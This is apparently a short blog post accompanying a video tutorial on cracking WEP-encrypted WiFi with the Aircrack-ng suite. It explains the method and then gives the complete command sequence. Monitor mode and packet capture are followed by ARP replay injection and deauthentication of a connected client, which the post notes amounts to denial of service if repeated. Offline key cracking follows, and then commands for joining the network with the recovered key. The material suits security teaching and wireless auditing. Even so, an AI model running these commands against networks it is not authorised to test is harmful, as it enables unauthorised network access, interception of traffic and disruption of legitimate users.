Cracking WiFi - WEP With a Client (Aircrack-ng)

Yet another video on "How to crack WEP".

Links

Watch video on-line:

Download video: http://download.g0tmi1k.com/videos_archive/WEP-ARP-Client.mp4

Method

ARP beacon is needed (depending on the attack method), so this can be re‐injected back into the network. To get this packets the attacker needs to disconnect a connected client currently on the network (if the attacker keeps on repeating this part, it will be a DoS to the client).

Once the key beacon has been captured and enough data injected/collected, it is now an offline attack either by brute force or a dictionary attack. Then its just a question of waiting then the attacker will have the key (brute forcing WEP can be less than 60 seconds!)

From here, the attacker can use that key to decrypt the captured data from before, and now is able to 'read' it as well as join the network.

Tools

• Aircrack-ng suite
• WiFi card that supports monitor mode & injection

Software

Name: Aircrack-ng

Version: 1.0-rc3

Home Page: http://www.aircrack-ng.org/doku.php

Download Link: hxxp://download.aircrack-ng.org/aircrack-ng-1.0-rc3.tar.gz

Commands

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15

airmon-ng stop mon0
airmon-ng start wlan0
airodump-ng --channel 8 --write output --bssid 00:19:5B:E7:52:70 mon0

aireplay-ng --arpreplay -e g0tmi1k -b 00:19:5B:E7:52:70 -h 00:12:17:94:90:0D mon0

aireplay-ng --deauth 10 -a 00:19:5B:E7:52:70 -c 00:12:17:94:90:0D mon0

aircrack-ng output*.cap

ifconfig wlan0 down
iwconfig wlan0 essid g0tmi1k
iwconfig wlan0 key 59EF19C76A
ifconfig wlan0 up
dhclient wlan0

Notes

• If you want WPA/WPA2 PSK (with a hidden SSID) - See: https://blog.g0tmi1k.com/2009/07/video-cracking-wifi-wpawpa2-hidden-ssid/ or https://blog.g0tmi1k.com/2010/02/video-cracking-wifi-wpawpa2-aircrack-ng/

Song: Mr. Oizo - Flat Beat

Video length: 03:50

Capture length: 07:23

Blog Post: https://blog.g0tmi1k.com/2010/03/cracking-wifi-wep-with-client/